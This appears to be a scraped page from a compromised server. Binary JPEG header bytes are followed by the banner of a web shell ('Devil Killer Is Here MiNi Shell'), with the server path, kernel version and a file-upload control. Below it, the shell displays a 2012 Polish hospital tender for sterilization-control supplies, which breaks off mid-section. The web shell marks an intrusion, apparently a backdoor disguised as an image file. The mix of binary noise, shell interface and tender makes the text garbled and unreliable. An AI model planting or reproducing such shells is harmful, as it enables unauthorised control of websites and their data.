JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120518/162154-N-2012.html

<p class="kh_header"><b>Radom: Zakup i dostawa produktów do kontroli oraz przeprowadzenia procesów sterylizacji dla potrzeb Radomskiego Szpitala Specjalistycznego</b><br>
<b>Numer ogłoszenia: 162154 - 2012; data zamieszczenia: 18.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa produktów do kontroli oraz przeprowadzenia procesów sterylizacji dla potrzeb Radomskiego Szpitala Specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1 - Kontrola procesu sterylizacji w sterylizatorze parowym
Lp.	Nazwa	Zapotrzebowanie orientacyjne na okres 4 lat 
ilość szt./ rolek
1.	Test symulacyjny Bowie-Dick (134°C, 3,5min.). Samoprzylepne testy paskowe, pokryte polimerem z symetrycznie rozłożoną substancję wskaźnikową na całej długości testu, kompatybilne z przyrządem testowym PCD posiadanym przez Szpital, składającym się z rurki i kapsuły w obudowie z tworzywa sztucznego oraz opisanym w pkt. 10 niniejszej części	4.800 szt.
2	Zintegrowany test do kontroli wsadu w procesie sterylizacji parą wodną. Samoprzylepne testy paskowe, pokryte polimerem z symetrycznie rozłożoną substancją wskaźnikową na całej długości testu, kompatybilne z przyrządem PCD posiadanym przez Szpital, składającym się z rurki i kapsuły ze stali kwasoodpornej w obudowie z tworzywa sztucznego oraz opisanym w pkt. 9 niniejszej części	40.000 szt.
3.	Etykiety dwukrotnie przylepne ze wskaźnikiem chemicznym do sterylizacji parą wodna, kompatybilne z metkownicą trzyrzędową alfanumeryczną GKE o symbolu 240-840 posiadaną przez Szpital z zapisem informacji wzdłuż przesuwu etykiet (750 szt etykiet na 1 rolce) + wałek z tuszem na 12 dostarczonych rolek.	1.800 rolek
4.	Etykiety dwukrotnie przylepne ze wskaźnikiem chemicznym do sterylizacji tlenkiem etylenu, kompatybilne z metkownicą trzyrzędową alfanumeryczną GKE o symbolu 240-840 posiadaną przez Szpital z zapisem informacji wzdłuż przesuwu etykiet (750 szt etykiet na 1 rolce) + wałek z tuszem na 2 dostarczone rolki.	1.200 rolek
5.	Wymazówki LuciPac W kompatybilne z przyrządem pomiarowym PD-10N Lumitester do kontroli poziomu higieny, posiadanym przez Szpital	960 szt.
6.	Fiolkowy wskaźnik biologiczny do rutynowej kontroli sterylizacji w parze wodnej, zawierający spory bakterii G.Stearothermophilus, populacja 105, nośnik z papieru, inkubacja w temperaturze 55-60°C, odczyt końcowy do 24h. Wskaźnik kompatybilny z przyrządem testowym procesu PCD z poz. 7 niniejszej części.	560 szt.
7.	Przyrząd testowy procesu PCD do fiolkowych wskaźników z poz.6 niniejszej części, składający się z rurki ze stali kwasoodpornej w obudowie z tworzywa sztucznego, kontrolujący usuwanie powietrza i penetrację pary dla wsadu narzędzi rurowych, narzędzi prostych (litych) i wsadów porowatych	4 szt.
8.	Inkubator do wskaźników biologicznych do pary wodnej z poz.6 niniejszej części. Pojemność min.10 wskaźników. Temperatura inkubacji 55-60°C. Wyposażony w urządzenie do zgniatania ampułek, termometr.	4 szt.
9.	Przyrząd testowy PCD składający się z rurki i kapsuły ze stali kwasoodpornej w obudowie z tworzywa sztucznego do wskaźników z poz. 2 niniejszej części.	4 szt.
10.	Przyrząd testowy PCD składający się z rurki i kapsuły ze stali kwasoodpornej w obudowie z tworzywa sztucznego do wskaźników z poz. 1 niniejszej części.	4 szt.


Część nr 2 - Kosz i pojemnik
Lp.	Nazwa	Zapotrzebowanie orientacyjne na okres 4 lat 
ilość szt.
1.	Kosz sterylizacyjny wykonany z drutu ze stali kwasoodpornej. Wyposażony w dwa uchwyty, krawędź górna i dno kosza wzmocnione grubym drutem, możliwość ustawienia kosza jeden na drugim. Wymiary kosza 580x275x245-260 mm są uzależnione od posiadanego sterylizatora.	60 szt.
2.	Przeźroczysty pojemnik transportowy z pokrywą z tworzywa sztucznego ze szczelnym zamknięciem. Wyposażony w dwa otwory w pokrywie i wannie do plombowania oraz uchwyty do oznaczania pojemnika kolorowymi znacznikami. Możliwość mycia i dezynfekcji w myjni-dezynfektorze firmy MMM posiadanej przez Szpital. Wymiary pojemnika 530x325x150 mm +/-20mm	8 szt.


Część nr 3 - Kontrola procesu sterylizacji w sterylizatorze tlenkiem etylenu
Lp.	Nazwa	Zapotrzebowanie orientacyjne na okres 4 lat 
/ilość szt./ rolek/
1.	Wieloparametrowy wskaźnik chemiczny klasy 4 do tlenku etylenu o liniowym ułożeniu substancji wskaźnikowej na długości 6-8cm. Zmiana koloru łatwa w interpretacji np. z bordowego na zielony. Zgodność z EN 867-1 lub EN ISO 11140-1.	4000 szt.
2.	Fiolkowy wskaźnik biologiczny o szybkim odczycie do tlenku etylenu. Ostateczny odczyt wyniku negatywnego/zabicie bakterii po 4 godzinach inkubacji. Na fiolce repozycjonowana nierwąca się naklejka ze wskaźnikiem chemicznym i miejscem do opisu	400 szt.
3.	a) Zestaw wskaźników biologicznych o szybkim odczycie do tlenku etylenu. Ostateczny odczyt wyniku negatywnego /zabicie bakterii po 4 godzinach inkubacji. 	500 szt.
	b) W zestawie autoczytnik do wskaźników biologicznych szybkiego odczytu o pojemności 12 wskaźników.	1 szt.
4.	Naboje gazowe kompatybilne ze sterylizatorem gazowym 3M model 5xl, zawierające 100 gram czystego EO, zgodne z instrukcja użytkowania sterylizatora i dopuszczone przez producenta sterylizatora. 	1300 szt.
5.	Oryginalny papier do drukarki sterylizatora, kompatybilny ze sterylizatorem gazowym Steri-Vac 5xI (modele produkowane od 2000r-nr seryjny powyżej 720000) i Steri-Vac 8xI.Rolka 79mmx30m.	60 rolek
Część nr 4 - Wskaźniki do kontroli sterylizacji parą wodną
Lp.	Nazwa	Zapotrzebowanie orientacyjne na okres 4 lat 
ilość szt.
1.	Wieloparametrowy, paskowy wskaźnik chemiczny do pary wodnej (liniowy), do kontroli sterylizacji parą wodną we wszystkich cyklach. Klasa D wg normy europejskiej 867-1 i klasa 4 wg normy międzynarodowej ISO11140-1.
Substancja wskaźnikowa umieszczona na całej długości paska. Pasek perforowany z możliwością podziału na dłuższy i krótszy pasek. Możliwość stosowania w pakietach jednorodnych (jeden rodzaj materiału) jak i niejednorodnych. Prawidłowy wynik sterylizacji wskazany przez definitywną zmianę koloru pola referencyjnego umieszczonego na środku paska. Temperatura 121°C i 134°C.	200.000 szt.


Część nr 5 - Materiały eksploatacyjne do sterylizatorów
Lp.	Nazwa	Zapotrzebowanie orientacyjne na okres 4 lat 
ilość szt./ rolek
1.	Papier termiczny do drukarki sterylizatora, kompatybilny z drukarką sterylizatora HS 33 firmy Getinge	80 rolek
2.	Koperty systemu dokumentacji wym. A4 do zapisywania informacji 
i przechowywania dokumentów potwierdzających prawidłową pracę sterylizatora, posiadająca miejsce na wklejenie testów Bowie - Dick z poz. 1 części 1, testów systemu kontroli wsadu z poz. 2 części 1. Nadruk na kopercie dwustronny do archiwizacji przebiegu cykli w dwóch sterylizatorach (wzór koperty zostanie załączony do umowy).	5.800 szt.


Część nr 6 - Materiały eksploatacyjne do zgrzewarek
Lp.	Nazwa	Zapotrzebowanie orientacyjne na okres 4 lat 
ilość szt./ rolek
1.	Testy do kontroli prawidłowości zgrzewania w zgrzewarkach rotacyjnych	8000 szt.


Część nr 7 - Sporale
Lp.	Nazwa	Zapotrzebowanie orientacyjne na okres 4 lat 
ilość szt.
1.	Biologiczny wskaźnik kontroli procesu sterylizacji parą wodną w nadciśnieniu Sporal A	700 szt.
2.	Biologiczny wskaźnik kontroli procesu sterylizacji suchym gorącym powietrzem Sporal S	400 szt.




Część nr 8 - Kontrola prawidłowości przeprowadzonej dezynfekcji
Lp.	Nazwa	Zapotrzebowanie orientacyjne na okres 4 lat 
ilość szt.
1.	Test wykrywający pozostałości białka na mytych i/ lub dezynfekowanych narzędziach chirurgicznych, wyrobach medycznych i innych powierzchniach. Zasada działania oparta na reakcji biuretowej. Wynik porównywalny z testem nihydrynowym, zgodnie z PN EN ISO 15883-1. Odczyt wyniku po inkubacji w kontrolowanych temperatury 55°C na podstawie zmiany zabarwienia. Wynik otrzymywany po 15 min/55°C. Bez konieczności przechowywania w lodówce. Do opakowania testów dołączona butelka płynu nawilżającego. Pakowane po 50 szt.	7000 szt.
2.	Inkubator do testów pozostałości białkowych, kompatybilny z testami z poz. 1. Pojemność 24 komory inkubacyjne. Regulacja temperatury w zakresie od 0 do 150°C. Dokładność pomiaru 0,1°C. Wyświetlacz aktualnej i nastawionej temperatury inkubacji.	1 szt.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2, 33.77.20.00-2, 33.19.10.00-5, 30.19.76.30-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada doświadczenie jeżeli wykaże, że w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał dostawy oferowanego towaru:
dla części nr 1 na kwotę min. 225.000,00 PLN,
dla części nr 2 na kwotę min. 17.000,00 PLN,
dla części nr 3 na kwotę min. 58.000,00 PLN,
dla części nr 4 na kwotę min. 19.000,00 PLN,
dla części nr 5 na kwotę min. 3.000,00 PLN,
dla części nr 6 na kwotę min. 6.000,00 PLN,
dla części nr 7 na kwotę min. 4.000,00 PLN,
dla części nr 8 na kwotę min. 48.000,00 PLN.
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">w zakresie potwierdzenia spełniania warunku określonego w pkt. 9.1.2.b) SIWZ - oświadczenie o braku obowiązku posiadania dokumentu opisanego w pkt. 9.3.2 SIWZ, dla produktów niekwalifikowanych jako wyrób medyczny, wskazujące konkretnie na te pozycje</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty tj.
- wpis do KRS lub Ewidencji Działalności Gospodarczej - które mogą być złożone w formie kopii poświadczonej za zgodność z oryginałem przez wykonawcę lub
- pełnomocnictwo do reprezentowania jeżeli ofertę składa pełnomocnik.
2. Wypełniony formularz oferty,
3. Wypełnione formularze cenowe/ specyfikacje techniczne dla oferowanej części</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) Ceny jednostkowe brutto mogą ulec zmianie w przypadku zmiany stawki podatku VAT wprowadzonej przepisami prawa - mogą się zmienić od dnia wejścia w życie danego aktu prawnego, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian,
b) Ceny jednostkowe brutto mogą również ulec zmianie po upływie roku obowiązywania umowy o wskaźnik inflacji ogłoszony przez prezesa GUS za ostatni kwartał przed upływem roku obowiązywania umowy,
c) Przedmiotem zmian treści umowy mogą być również zmiany adresowe lub rejestrowe stron umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny przy ul. Lekarskiej 4 w Radomiu (III piętro pok. 313 - Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2012 godzina 11:00, miejsce: Radomski Szpital Specjalistyczny przy ul. Lekarskiej 4 w 26-610  Radomiu w pok. 313 lub 308 III piętro  /Dział Zamówień Publicznych, Funduszy Strukturalnych i Zaopatrzenia/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kontrola procesu sterylizacji w sterylizatorze parowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa	Zapotrzebowanie orientacyjne na okres 4 lat 
ilość szt./ rolek
1.	Test symulacyjny Bowie-Dick (134°C, 3,5min.). Samoprzylepne testy paskowe, pokryte polimerem z symetrycznie rozłożoną substancję wskaźnikową na całej długości testu, kompatybilne z przyrządem testowym PCD posiadanym przez Szpital, składającym się z rurki i kapsuły w obudowie z tworzywa sztucznego oraz opisanym w pkt. 10 niniejszej części	4.800 szt.
2	Zintegrowany test do kontroli wsadu w procesie sterylizacji parą wodną. Samoprzylepne testy paskowe, pokryte polimerem z symetrycznie rozłożoną substancją wskaźnikową na całej długości testu, kompatybilne z przyrządem PCD posiadanym przez Szpital, składającym się z rurki i kapsuły ze stali kwasoodpornej w obudowie z tworzywa sztucznego oraz opisanym w pkt. 9 niniejszej części	40.000 szt.
3.	Etykiety dwukrotnie przylepne ze wskaźnikiem chemicznym do sterylizacji parą wodna, kompatybilne z metkownicą trzyrzędową alfanumeryczną GKE o symbolu 240-840 posiadaną przez Szpital z zapisem informacji wzdłuż przesuwu etykiet (750 szt etykiet na 1 rolce) + wałek z tuszem na 12 dostarczonych rolek.	1.800 rolek
4.	Etykiety dwukrotnie przylepne ze wskaźnikiem chemicznym do sterylizacji tlenkiem etylenu, kompatybilne z metkownicą trzyrzędową alfanumeryczną GKE o symbolu 240-840 posiadaną przez Szpital z zapisem informacji wzdłuż przesuwu etykiet (750 szt etykiet na 1 rolce) + wałek z tuszem na 2 dostarczone rolki.	1.200 rolek
5.	Wymazówki LuciPac W kompatybilne z przyrządem pomiarowym PD-10N Lumitester do kontroli poziomu higieny, posiadanym przez Szpital	960 szt.
6.	Fiolkowy wskaźnik biologiczny do rutynowej kontroli sterylizacji w parze wodnej, zawierający spory bakterii G.Stearothermophilus, populacja 105, nośnik z papieru, inkubacja w temperaturze 55-60°C, odczyt końcowy do 24h. Wskaźnik kompatybilny z przyrządem testowym procesu PCD z poz. 7 niniejszej części.	560 szt.
7.	Przyrząd testowy procesu PCD do fiolkowych wskaźników z poz.6 niniejszej części, składający się z rurki ze stali kwasoodpornej w obudowie z tworzywa sztucznego, kontrolujący usuwanie powietrza i penetrację pary dla wsadu narzędzi rurowych, narzędzi prostych (litych) i wsadów porowatych	4 szt.
8.	Inkubator do wskaźników biologicznych do pary wodnej z poz.6 niniejszej części. Pojemność min.10 wskaźników. Temperatura inkubacji 55-60°C. Wyposażony w urządzenie do zgniatania ampułek, termometr.	4 szt.
9.	Przyrząd testowy PCD składający się z rurki i kapsuły ze stali kwasoodpornej w obudowie z tworzywa sztucznego do wskaźników z poz. 2 niniejszej części.	4 szt.
10.	Przyrząd testowy PCD składający się z rurki i kapsuły ze stali kwasoodpornej w obudowie z tworzywa sztucznego do wskaźników z poz. 1 niniejszej części.	4 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 48.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kosz i pojemnik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa	Zapotrzebowanie orientacyjne na okres 4 lat 
ilość szt.
1.	Kosz sterylizacyjny wykonany z drutu ze stali kwasoodpornej. Wyposażony w dwa uchwyty, krawędź górna i dno kosza wzmocnione grubym drutem, możliwość ustawienia kosza jeden na drugim. Wymiary kosza 580x275x245-260 mm są uzależnione od posiadanego sterylizatora.	60 szt.
2.	Przeźroczysty pojemnik transportowy z pokrywą z tworzywa sztucznego ze szczelnym zamknięciem. Wyposażony w dwa otwory w pokrywie i wannie do plombowania oraz uchwyty do oznaczania pojemnika kolorowymi znacznikami. Możliwość mycia i dezynfekcji w myjni-dezynfektorze firmy MMM posiadanej przez Szpital. Wymiary pojemnika 530x325x150 mm +/-20mm	8 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 48.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kontrola procesu sterylizacji w sterylizatorze tlenkiem etylenu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa	Zapotrzebowanie orientacyjne na okres 4 lat 
/ilość szt./ rolek/
